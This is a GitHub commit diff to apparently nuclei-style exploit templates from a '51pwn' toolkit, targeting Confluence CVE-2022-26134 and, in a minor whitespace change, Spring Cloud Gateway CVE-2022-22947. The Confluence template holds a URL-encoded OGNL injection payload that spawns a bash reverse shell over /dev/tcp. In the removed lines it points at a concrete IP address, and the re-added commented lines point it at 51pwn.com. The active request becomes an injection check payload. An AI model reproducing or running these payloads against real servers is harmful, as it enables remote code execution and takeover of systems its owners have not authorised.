Skip to content

Commit 1d71a98

Browse files
committed
x 2022-11-03
1 parent 8694ce9 commit 1d71a98

File tree

2 files changed

+15
-18
lines changed

2 files changed

+15
-18
lines changed

config/51pwn/Confluence_CVE-2022-26134.yaml

Lines changed: 14 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -19,25 +19,25 @@ variables:
1919
CheckPayload1: "%24%7B%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22Host%22%2C%22{{randstr}}%22%29%7D/"
2020
# CheckPayload1: "%24%7B%28java.net.InetAddress.getByName%28%22{{interactsh-url}}%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22Host%22%2C%2251pwn%22%29%29%7D/"
2121
# for reverse
22-
RvsHst: "18.162.227.180"
23-
RvsHstPort: "9999"
24-
RvsPayload: "/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/{{RvsHst}}/{{RvsHstPort}}%200%3E%261%27%29.start%28%29%22%29%7D/"
22+
# RvsHst: "51pwn.com"
23+
# RvsHstPort: "9999"
24+
# RvsPayload: "/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/{{RvsHst}}/{{RvsHstPort}}%200%3E%261%27%29.start%28%29%22%29%7D/"
2525
# GET {{mypaths}}/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/docker.for.mac.localhost/9999%200%3E%261%27%29.start%28%29%22%29%7D/ HTTP/1.1
2626
# # 107.182.191.202
2727
requests:
2828
- raw:
29-
- |+
30-
GET {{mypaths}}/{{pay1}} HTTP/1.1
31-
Host: {{Hostname}}
32-
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
33-
Accept:*/*
34-
Pragma:no-cache
35-
Accept-Encoding:gzip, deflate
36-
Connection: close
37-
Content-Length: 0
29+
# - |+
30+
# GET {{mypaths}}/{{RvsPayload}} HTTP/1.1
31+
# Host: {{Hostname}}
32+
# User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
33+
# Accept:*/*
34+
# Pragma:no-cache
35+
# Accept-Encoding:gzip, deflate
36+
# Connection: close
37+
# Content-Length: 0
3838

3939
- |+
40-
GET {{mypaths}}/{{pay1}} HTTP/1.1
40+
GET {{mypaths}}/{{CheckPayload1}} HTTP/1.1
4141
Host: {{Hostname}}
4242
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
4343
Accept:*/*
@@ -51,10 +51,7 @@ requests:
5151
mypaths:
5252
- "/bootstrap"
5353
- ""
54-
pay1:
55-
- "{{RvsPayload}}"
56-
- "{{CheckPayload1}}"
57-
attack: clusterbomb
54+
attack: pitchfork
5855
unsafe: true
5956
# pipeline: true
6057
# pipeline-concurrent-connections: 40

config/51pwn/spring_cloud_gateway_CVE_2022_22947.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@ requests:
1818
Pragma:no-cache
1919
Content-Type: application/json
2020
Connection: keep-alive
21-
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
21+
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
2222
Content-Length: 333
2323
2424
{

0 commit comments

Comments
 (0)